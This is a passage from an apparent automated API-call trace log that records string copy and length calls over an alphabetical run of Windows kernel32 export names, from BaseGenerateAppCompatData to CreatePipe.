lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.064] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.065] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.065] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.065] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.065] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.065] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.065] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.065] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.065] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.065] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.065] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.065] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.065] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.065] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.065] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.065] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.065] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.065] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.065] lstrlenA (lpString="BEEP") returned 4 [0082.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.066] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.066] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.066] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.066] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.066] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.066] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.066] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.066] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.066] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.066] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.066] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.066] lstrlenA (lpString="CANCELIO") returned 8 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.066] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.066] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.066] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.066] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.066] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.066] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.066] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.066] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.067] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.067] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.067] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.067] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.067] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.067] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.067] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.067] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.067] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.067] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.067] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.067] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.067] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.067] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.067] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.067] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.067] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.067] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.067] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.068] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.068] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.068] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.068] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.068] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.068] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.068] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.068] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.068] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.068] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.068] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.068] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.068] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.068] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.068] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.068] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.068] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.068] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.068] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.069] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.069] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.069] lstrlenA (lpString="COPYFILEA") returned 9 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.069] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.069] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.069] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.069] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.069] lstrlenA (lpString="COPYFILEW") returned 9 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.069] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.069] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.069] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.069] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.069] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.069] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.069] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.069] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.069] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.069] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.069] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.070] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.070] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.070] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.070] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.070] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.070] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.070] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.070] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.070] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.070] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.070] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.070] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.070] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.070] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.070] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.070] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.070] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.070] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.070] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.070] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.071] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.071] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.071] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.071] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.071] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.071] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.071] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.071] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.071] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.071] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.071] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.071] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.071] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.071] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: 